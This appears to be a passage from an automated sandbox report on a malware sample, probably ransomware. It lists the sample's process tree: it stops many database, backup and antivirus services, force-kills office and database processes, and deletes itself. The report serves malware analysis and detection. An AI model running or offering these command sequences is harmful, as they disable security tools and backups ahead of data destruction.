C:\Windows\system32\net1 stop MSSQLFDLauncher $ SBSMONITORING /y
4⤵
PID:1688

C:\Windows\system32\net.exe
net stop MSSQLFDLauncher $ SHAREPOINT /y
3⤵
PID:1184

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQLFDLauncher $ SHAREPOINT /y
4⤵
PID:1840

C:\Windows\system32\net.exe
net stop MSSQLFDLauncher $ SQL_2008 /y
3⤵
PID:420

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQLFDLauncher $ SQL_2008 /y
4⤵
PID:2024

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SNAC /y
5⤵
PID:420

C:\Windows\system32\net.exe
net stop MSSQLFDLauncher $ SYSTEM_BGC /y
3⤵
PID:1692

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQLFDLauncher $ SYSTEM_BGC /y
4⤵
PID:1536

C:\Windows\system32\net.exe
net stop MSSQLFDLauncher $ TPS /y
3⤵
PID:1036

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQLFDLauncher $ TPS /y
4⤵
PID:1088

C:\Windows\system32\net.exe
net stop MSSQLFDLauncher $ TPSAMA /y
3⤵
PID:1092

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQLFDLauncher $ TPSAMA /y
4⤵
PID:1704

C:\Windows\system32\net.exe
net stop MSSQLSERVER /y
3⤵
PID:1104

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQLSERVER /y
4⤵
PID:824

C:\Windows\system32\net.exe
net stop MSSQLServerADHelper100 /y
3⤵
PID:1700

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQLServerADHelper100 /y
4⤵
PID:1488

C:\Windows\system32\net.exe
net stop MSSQLServerOLAPService /y
3⤵
PID:1524

C:\Windows\system32\net.exe
net stop MySQL80 /y
3⤵
PID:1712

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MySQL80 /y
4⤵
PID:828

C:\Windows\system32\net.exe
net stop MySQL57 /y
3⤵
PID:1560

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MySQL57 /y
4⤵
PID:1080

C:\Windows\system32\net.exe
net stop ntrtscan /y
3⤵
PID:1576

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop ntrtscan /y
4⤵
PID:1908

C:\Windows\system32\net.exe
net stop OracleClientCache80 /y
3⤵
PID:1980

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop OracleClientCache80 /y
4⤵
PID:1520

C:\Windows\system32\net.exe
net stop PDVFSService /y
3⤵
PID:1664

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop PDVFSService /y
4⤵
PID:1068

C:\Windows\system32\net.exe
net stop POP3SVC /y
3⤵
PID:980

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop POP3SVC /y
4⤵
PID:1736

C:\Windows\system32\net.exe
net stop ReportServer /y
3⤵
PID:1892

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop ReportServer /y
4⤵
PID:912

C:\Windows\system32\net.exe
net stop ReportServer $ SQL_2008 /y
3⤵
PID:1268

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop ReportServer $ SQL_2008 /y
4⤵
PID:900

C:\Windows\system32\net.exe
net stop ReportServer $ SYSTEM_BGC /y
3⤵
PID:1676

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop ReportServer $ SYSTEM_BGC /y
4⤵
PID:1620

C:\Windows\system32\net.exe
net stop ReportServer $ TPS /y
3⤵
PID:1616

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop ReportServer $ TPS /y
4⤵
PID:1508

C:\Windows\system32\net.exe
net stop ReportServer $ TPSAMA /y
3⤵
PID:1660

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop ReportServer $ TPSAMA /y
4⤵
PID:2028

C:\Windows\system32\net.exe
net stop RESVC /y
3⤵
PID:1612

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop RESVC /y
4⤵
PID:1464

C:\Windows\system32\net.exe
net stop sacsvr /y
3⤵
PID:576

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop sacsvr /y
4⤵
PID:1728

C:\Windows\system32\net.exe
net stop SamSs /y
3⤵
PID:268

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SamSs /y
4⤵
PID:1060

C:\Windows\system32\net.exe
net stop SAVAdminService /y
3⤵
PID:1128

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SAVAdminService /y
4⤵
PID:1256

C:\Windows\system32\net.exe
net stop ????????? /y
3⤵
PID:1288

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop ????????? /y
4⤵
PID:660

C:\Windows\system32\net.exe
net stop SDRSVC /y
3⤵
PID:920

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SDRSVC /y
4⤵
PID:1244

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop swi_update /y
5⤵
PID:1288

C:\Windows\system32\net.exe
net stop SepMasterService /y
3⤵
PID:688

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SepMasterService /y
4⤵
PID:1416

C:\Windows\system32\net.exe
net stop ShMonitor /y
3⤵
PID:1404

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop ShMonitor /y
4⤵
PID:568

C:\Windows\system32\net.exe
net stop Smcinst /y
3⤵
PID:976

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop Smcinst /y
4⤵
PID:1564

C:\Windows\system32\net.exe
net stop SmcService /y
3⤵
PID:1688

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SmcService /y
4⤵
PID:1904

C:\Windows\system32\net.exe
net stop SMTPSVC /y
3⤵
PID:1840

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SMTPSVC /y
4⤵
PID:1184

C:\Windows\system32\net.exe
net stop SNAC /y
3⤵
PID:2024

C:\Windows\system32\net.exe
net stop SntpService /y
3⤵
PID:1536

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SntpService /y
4⤵
PID:1692

C:\Windows\system32\net.exe
net stop sophossps /y
3⤵
PID:1088

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop sophossps /y
4⤵
PID:1036

C:\Windows\system32\net.exe
net stop SQLAgent $ BKUPEXEC /y
3⤵
PID:1704

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SQLAgent $ BKUPEXEC /y
4⤵
PID:1092

C:\Windows\system32\net.exe
net stop SQLAgent $ ECWDB2 /y
3⤵
PID:824

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SQLAgent $ ECWDB2 /y
4⤵
PID:1104

C:\Windows\system32\net.exe
net stop SQLAgent $ PRACTTICEBGC /y
3⤵
PID:1488

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SQLAgent $ PRACTTICEBGC /y
4⤵
PID:1700

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop ekrn /y
4⤵
PID:1700

C:\Windows\system32\net.exe
net stop SQLAgent $ PRACTTICEMGT /y
3⤵
PID:1532

C:\Windows\system32\net.exe
net stop SQLAgent $ PROFXENGAGEMENT /y
3⤵
PID:828

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SQLAgent $ PROFXENGAGEMENT /y
4⤵
PID:1712

C:\Windows\system32\net.exe
net stop SQLAgent $ SBSMONITORING /y
3⤵
PID:1080

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SQLAgent $ SBSMONITORING /y
4⤵
PID:1560

C:\Windows\system32\net.exe
net stop SQLAgent $ SHAREPOINT /y
3⤵
PID:1908

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SQLAgent $ SHAREPOINT /y
4⤵
PID:1576

C:\Windows\system32\net.exe
net stop SQLAgent $ SQL_2008 /y
3⤵
PID:1520

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SQLAgent $ SQL_2008 /y
4⤵
PID:1980

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop klnagent /y
4⤵
PID:1980

C:\Windows\system32\net.exe
net stop SQLAgent $ SYSTEM_BGC /y
3⤵
PID:1068

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SQLAgent $ SYSTEM_BGC /y
4⤵
PID:1664

C:\Windows\system32\net.exe
net stop SQLAgent $ TPS /y
3⤵
PID:1736

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SQLAgent $ TPS /y
4⤵
PID:980

C:\Windows\system32\net.exe
net stop SQLAgent $ TPSAMA /y
3⤵
PID:912

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SQLAgent $ TPSAMA /y
4⤵
PID:1892

C:\Windows\system32\net.exe
net stop SQLAgent $ VEEAMSQL2008R2 /y
3⤵
PID:900

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SQLAgent $ VEEAMSQL2008R2 /y
4⤵
PID:1268

C:\Windows\system32\net.exe
net stop SQLAgent $ VEEAMSQL2012 /y
3⤵
PID:1620

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SQLAgent $ VEEAMSQL2012 /y
4⤵
PID:1676

C:\Windows\system32\net.exe
net stop SQLBrowser /y
3⤵
PID:1508

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SQLBrowser /y
4⤵
PID:1616

C:\Windows\system32\net.exe
net stop SQLSafeOLRService /y
3⤵
PID:2028

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SQLSafeOLRService /y
4⤵
PID:1660

C:\Windows\system32\net.exe
net stop SQLSERVERAGENT /y
3⤵
PID:1464

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SQLSERVERAGENT /y
4⤵
PID:1612

C:\Windows\system32\net.exe
net stop SQLTELEMETRY /y
3⤵
PID:1728

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SQLTELEMETRY /y
4⤵
PID:576

C:\Windows\system32\net.exe
net stop SQLTELEMETRY $ ECWDB2 /y
3⤵
PID:1060

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SQLTELEMETRY $ ECWDB2 /y
4⤵
PID:268

C:\Windows\system32\net.exe
net stop SQLWriter /y
3⤵
PID:1256

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SQLWriter /y
4⤵
PID:1128

C:\Windows\system32\net.exe
net stop SstpSvc /y
3⤵
PID:1084

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SstpSvc /y
4⤵
PID:1740

C:\Windows\system32\net.exe
net stop svcGenericHost /y
3⤵
PID:1472

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop svcGenericHost /y
4⤵
PID:624

C:\Windows\system32\net.exe
net stop swi_filter /y
3⤵
PID:240

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop swi_filter /y
4⤵
PID:676

C:\Windows\system32\net.exe
net stop swi_service /y
3⤵
PID:1408

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop swi_service /y
4⤵
PID:428

C:\Windows\system32\net.exe
net stop swi_update_64 /y
3⤵
PID:512

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop swi_update_64 /y
4⤵
PID:1460

C:\Windows\system32\net.exe
net stop TmCCSF /y
3⤵
PID:336

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop TmCCSF /y
4⤵
PID:1624

C:\Windows\system32\net.exe
net stop tmlisten /y
3⤵
PID:1264

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop tmlisten /y
4⤵
PID:420

C:\Windows\system32\net.exe
net stop TrueKey /y
3⤵
PID:2024

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop TrueKey /y
4⤵
PID:1692

C:\Windows\system32\net.exe
net stop TrueKeyScheduler /y
3⤵
PID:1824

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop TrueKeyScheduler /y
4⤵
PID:1696

C:\Windows\system32\net.exe
net stop TrueKeyServiceHelper /y
3⤵
PID:1544

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop TrueKeyServiceHelper /y
4⤵
PID:1064

C:\Windows\system32\net.exe
net stop UI0Detect /y
3⤵
PID:1936

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop UI0Detect /y
4⤵
PID:1556

C:\Windows\system32\net.exe
net stop VeeamBackupSvc /y
3⤵
PID:1720

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop VeeamBackupSvc /y
4⤵
PID:1044

C:\Windows\system32\net.exe
net stop VeeamBrokerSvc /y
3⤵
PID:860

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop VeeamBrokerSvc /y
4⤵
PID:1916

C:\Windows\system32\net.exe
net stop VeeamCatalogSvc /y
3⤵
PID:1912

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop VeeamCatalogSvc /y
4⤵
PID:1992

C:\Windows\system32\net.exe
net stop VeeamCloudSvc /y
3⤵
PID:1984

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop VeeamCloudSvc /y
4⤵
PID:1356

C:\Windows\system32\net.exe
net stop VeeamDeploymentService /y
3⤵
PID:1732

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop VeeamDeploymentService /y
4⤵
PID:852

C:\Windows\system32\net.exe
net stop VeeamDeploySvc /y
3⤵
PID:916

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop VeeamDeploySvc /y
4⤵
PID:856

C:\Windows\system32\net.exe
net stop VeeamEnterpriseManagerSvc /y
3⤵
PID:1760

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop VeeamEnterpriseManagerSvc /y
4⤵
PID:1272

C:\Windows\system32\net.exe
net stop VeeamMountSvc /y
3⤵
PID:1652

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop VeeamMountSvc /y
4⤵
PID:996

C:\Windows\system32\net.exe
net stop VeeamNFSSvc /y
3⤵
PID:1608

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop VeeamNFSSvc /y
4⤵
PID:1148

C:\Windows\system32\net.exe
net stop VeeamRESTSvc /y
3⤵
PID:1768

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop VeeamRESTSvc /y
4⤵
PID:1120

C:\Windows\system32\net.exe
net stop VeeamTransportSvc /y
3⤵
PID:520

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop VeeamTransportSvc /y
4⤵
PID:1144

C:\Windows\system32\net.exe
net stop W3svc /y
3⤵
PID:544

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop W3svc /y
4⤵
PID:1588

C:\Windows\system32\net.exe
net stop wbengine /y
3⤵
PID:776

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop wbengine /y
4⤵
PID:1484

C:\Windows\system32\net.exe
net stop WRSVC /y
3⤵
PID:288

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop WRSVC /y
4⤵
PID:560

C:\Windows\system32\net.exe
net stop MSSQL $ VEEAMSQL2008R2 /y
3⤵
PID:1516

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQL $ VEEAMSQL2008R2 /y
4⤵
PID:1456

C:\Windows\system32\net.exe
net stop SQLAgent $ VEEAMSQL2008R2 /y
3⤵
PID:1468

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SQLAgent $ VEEAMSQL2008R2 /y
4⤵
PID:756

C:\Windows\system32\net.exe
net stop VeeamHvIntegrationSvc /y
3⤵
PID:1412

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop VeeamHvIntegrationSvc /y
4⤵
PID:1420

C:\Windows\system32\net.exe
net stop swi_update /y
3⤵
PID:1244

C:\Windows\system32\net.exe
net stop SQLAgent $ CXDB /y
3⤵
PID:1416

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SQLAgent $ CXDB /y
4⤵
PID:920

C:\Windows\system32\net.exe
net stop SQLAgent $ CITRIX_METAFRAME /y
3⤵
PID:568

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SQLAgent $ CITRIX_METAFRAME /y
4⤵
PID:688

C:\Windows\system32\net.exe
net stop SQL ???????? /y
3⤵
PID:1564

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SQL ???????? /y
4⤵
PID:1404

C:\Windows\system32\net.exe
net stop MSSQL $ PROD /y
3⤵
PID:1904

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQL $ PROD /y
4⤵
PID:976

C:\Windows\system32\net.exe
net stop Zoolz 2 ?????? /y
3⤵
PID:1184

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop Zoolz 2 ?????? /y
4⤵
PID:1688

C:\Windows\system32\net.exe
net stop MSSQLServerADHelper /y
3⤵
PID:1572

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQLServerADHelper /y
4⤵
PID:1840

C:\Windows\system32\net.exe
net stop SQLAgent $ PROD /y
3⤵
PID:1684

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SQLAgent $ PROD /y
4⤵
PID:1096

C:\Windows\system32\net.exe
net stop msftesql $ PROD /y
3⤵
PID:1088

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop msftesql $ PROD /y
4⤵
PID:1036

C:\Windows\system32\net.exe
net stop NetMsmqActivator /y
3⤵
PID:1704

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop NetMsmqActivator /y
4⤵
PID:1092

C:\Windows\system32\net.exe
net stop EhttpSrv /y
3⤵
PID:824

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop EhttpSrv /y
4⤵
PID:1104

C:\Windows\system32\net.exe
net stop ekrn /y
3⤵
PID:1488

C:\Windows\system32\net.exe
net stop ESHASRV /y
3⤵
PID:1532

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop ESHASRV /y
4⤵
PID:1524

C:\Windows\system32\net.exe
net stop MSSQL $ SOPHOS /y
3⤵
PID:828

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQL $ SOPHOS /y
4⤵
PID:1712

C:\Windows\system32\net.exe
net stop SQLAgent $ SOPHOS /y
3⤵
PID:1080

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SQLAgent $ SOPHOS /y
4⤵
PID:1560

C:\Windows\system32\net.exe
net stop AVP /y
3⤵
PID:1908

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop AVP /y
4⤵
PID:1576

C:\Windows\system32\net.exe
net stop klnagent /y
3⤵
PID:1520

C:\Windows\system32\net.exe
net stop MSSQL $ SQLEXPRESS /y
3⤵
PID:1068

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQL $ SQLEXPRESS /y
4⤵
PID:1664

C:\Windows\system32\net.exe
net stop SQLAgent $ /y
3⤵
PID:1736

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SQLAgent $ /y
4⤵
PID:980

C:\Windows\system32\net.exe
net stop SQLEXPRESS /y
3⤵
PID:912

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SQLEXPRESS /y
4⤵
PID:1892

C:\Windows\system32\net.exe
net stop wbengine /y
3⤵
PID:900

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop wbengine /y
4⤵
PID:1268

C:\Windows\system32\net.exe
net stop kavfsslp /y
3⤵
PID:1620

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop kavfsslp /y
4⤵
PID:1676

C:\Windows\system32\net.exe
net stop KAVFSGT /y
3⤵
PID:1508

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop KAVFSGT /y
4⤵
PID:1616

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /f /im zoolz.exe >NUL 2> 1 /im agntsvc.exe >NUL 2> 1 /im dbeng50.exe >NUL 2> 1 /im dbsnmp.exe >NUL 2> 1 /im encsvc.exe >NUL 2> 1 /im excel.exe >NUL 2> 1 /im firefoxconfig.exe >NUL 2> 1 /im Infopath.exe >NUL 2> 1 /im isqlplussvc.exe >NUL 2> 1 /im msaccess.exe >NUL 2> 1 /im msftesql.exe >NUL 2> 1 /im mspub.exe >NUL 2> 1 /im mydesktopqos.exe >NUL 2> 1 /im mydesktopservice.exe >NUL 2> 1 /im mysqld.exe >NUL 2> 1 /im mysqld-nt.exe >NUL 2> 1 /im mysqld-opt.exe >NUL 2> 1 /im ocautoupds.exe >NUL 2> 1 /im ocomm.exe >NUL 2> 1 /im ocssd.exe >NUL 2> 1 /im onenote.exe >NUL 2> 1 /im oracle.exe >NUL 2> 1 /im outlook.exe >NUL 2> 1 /im powerpnt.exe >NUL 2> 1 /im sqbcoreservice.exe >NUL 2> 1 /im sqlagent.exe >NUL 2> 1 /im sqlbrowser.exe >NUL 2> 1 /im sqlservr.exe >NUL 2> 1 /im sqlwriter.exe >NUL 2> 1 /im steam.exe >NUL 2> 1 /im synctime.exe >NUL 2> 1 /im tbirdconfig.exe >NUL 2> 1 /im thebat.exe >NUL 2> 1 /im thebat64.exe >NUL 2> 1 /im thunderbird.exe >NUL 2> 1 /im visio.exe >NUL 2> 1 /im winword.exe >NUL 2> 1 /im wordpad.exe >NUL 2> 1 /im xfssvccon.exe >NUL 2> 1 /im tmlisten.exe >NUL 2> 1 /im PccNTMon.exe >NUL 2> 1 /im CNTAoSMgr.exe >NUL 2> 1 /im Ntrtscan.exe >NUL 2> 1 /im mbamtray.exe >NUL 2> 1 /im cmd.exe >NUL 2> 1
2⤵
PID:2028

C:\Windows\system32\taskkill.exe
taskkill /f /im zoolz.exe /im agntsvc.exe /im dbeng50.exe /im dbsnmp.exe /im encsvc.exe /im excel.exe /im firefoxconfig.exe /im Infopath.exe /im isqlplussvc.exe /im msaccess.exe /im msftesql.exe /im mspub.exe /im mydesktopqos.exe /im mydesktopservice.exe /im mysqld.exe /im mysqld-nt.exe /im mysqld-opt.exe /im ocautoupds.exe /im ocomm.exe /im ocssd.exe /im onenote.exe /im oracle.exe /im outlook.exe /im powerpnt.exe /im sqbcoreservice.exe /im sqlagent.exe /im sqlbrowser.exe /im sqlservr.exe /im sqlwriter.exe /im steam.exe /im synctime.exe /im tbirdconfig.exe /im thebat.exe /im thebat64.exe /im thunderbird.exe /im visio.exe /im winword.exe /im wordpad.exe /im xfssvccon.exe /im tmlisten.exe /im PccNTMon.exe /im CNTAoSMgr.exe /im Ntrtscan.exe /im mbamtray.exe /im cmd.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1612

C:\Windows\system32\cmd.exe
cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\2b9949889dd265aa85dd7712d7b8344832dcb6ee03574aab23cee91ff68557de.exe"
2⤵
- Deletes itself
PID:1064

C:\Windows\system32\PING.EXE
ping 1.1.1.1 -n 1 -w 3000
3⤵
- Runs ping.exe
PID:824

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSExchangeIS /y
1⤵
PID:1092

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Remote System Discovery

1

T1018

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/288-60-0x0000000000000000-mapping.dmp

Download
memory/420-107-0x0000000000000000-mapping.dmp

Download
memory/512-66-0x0000000000000000-mapping.dmp

Download
memory/520-56-0x0000000000000000-mapping.dmp

Download
memory/568-100-0x0000000000000000-mapping.dmp

Download
memory/568-61-0x0000000000000000-mapping.dmp

Download
memory/576-93-0x0000000000000000-mapping.dmp

Download
memory/660-57-0x0000000000000000-mapping.dmp

Download
memory/660-96-0x0000000000000000-mapping.dmp

Download
memory/676-68-0x0000000000000000-mapping.dmp

Download
memory/688-59-0x0000000000000000-mapping.dmp

Download
memory/688-98-0x0000000000000000-mapping.dmp

Download
memory/756-58-0x0000000000000000-mapping.dmp

Download
memory/824-110-0x0000000000000000-mapping.dmp

Download
memory/824-71-0x0000000000000000-mapping.dmp

Download
memory/828-75-0x0000000000000000-mapping.dmp

Download
memory/828-114-0x0000000000000000-mapping.dmp

Download
memory/852-79-0x0000000000000000-mapping.dmp

Download
memory/856-82-0x0000000000000000-mapping.dmp

Download
memory/916-85-0x0000000000000000-mapping.dmp

Download
memory/996-83-0x0000000000000000-mapping.dmp

Download
memory/1036-69-0x0000000000000000-mapping.dmp

Download
memory/1036-108-0x0000000000000000-mapping.dmp

Download
memory/1060-95-0x0000000000000000-mapping.dmp

Download
memory/1064-74-0x0000000000000000-mapping.dmp

Download
memory/1080-117-0x0000000000000000-mapping.dmp

Download
memory/1088-109-0x0000000000000000-mapping.dmp

Download
memory/1092-111-0x0000000000000000-mapping.dmp

Download
memory/1128-94-0x0000000000000000-mapping.dmp

Download
memory/1128-55-0x0000000000000000-mapping.dmp

Download
memory/1144-87-0x0000000000000000-mapping.dmp

Download
memory/1148-86-0x0000000000000000-mapping.dmp

Download
memory/1184-65-0x0000000000000000-mapping.dmp

Download
memory/1184-104-0x0000000000000000-mapping.dmp

Download
memory/1244-99-0x0000000000000000-mapping.dmp

Download
memory/1288-97-0x0000000000000000-mapping.dmp

Download
memory/1404-101-0x0000000000000000-mapping.dmp

Download
memory/1412-64-0x0000000000000000-mapping.dmp

Download
memory/1440-118-0x000007FEFBFE1000-0x000007FEFBFE3000-memory.dmp

Filesize
8KB

Download
memory/1472-62-0x0000000000000000-mapping.dmp

Download
memory/1488-113-0x0000000000000000-mapping.dmp

Download
memory/1508-89-0x0000000000000000-mapping.dmp

Download
memory/1524-115-0x0000000000000000-mapping.dmp

Download
memory/1536-67-0x0000000000000000-mapping.dmp

Download
memory/1536-106-0x0000000000000000-mapping.dmp

Download
memory/1560-77-0x0000000000000000-mapping.dmp

Download
memory/1560-116-0x0000000000000000-mapping.dmp

Download
memory/1564-103-0x0000000000000000-mapping.dmp

Download
memory/1572-70-0x0000000000000000-mapping.dmp

Download
memory/1612-90-0x0000000000000000-mapping.dmp

Download
memory/1624-72-0x0000000000000000-mapping.dmp

Download
memory/1680-54-0x0000000000000000-mapping.dmp

Download
memory/1688-102-0x0000000000000000-mapping.dmp

Download
memory/1688-63-0x0000000000000000-mapping.dmp

Download
memory/1700-73-0x0000000000000000-mapping.dmp

Download
memory/1700-112-0x0000000000000000-mapping.dmp

Download
memory/1712-80-0x0000000000000000-mapping.dmp

Download
memory/1728-92-0x0000000000000000-mapping.dmp

Download
memory/1760-88-0x0000000000000000-mapping.dmp

Download
memory/1824-76-0x0000000000000000-mapping.dmp

Download
memory/1840-105-0x0000000000000000-mapping.dmp

Download
memory/1912-81-0x0000000000000000-mapping.dmp

Download
memory/1916-78-0x0000000000000000-mapping.dmp

Download
memory/1984-84-0x0000000000000000-mapping.dmp

Download
memory/2028-91-0x0000000000000000-mapping.dmp

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads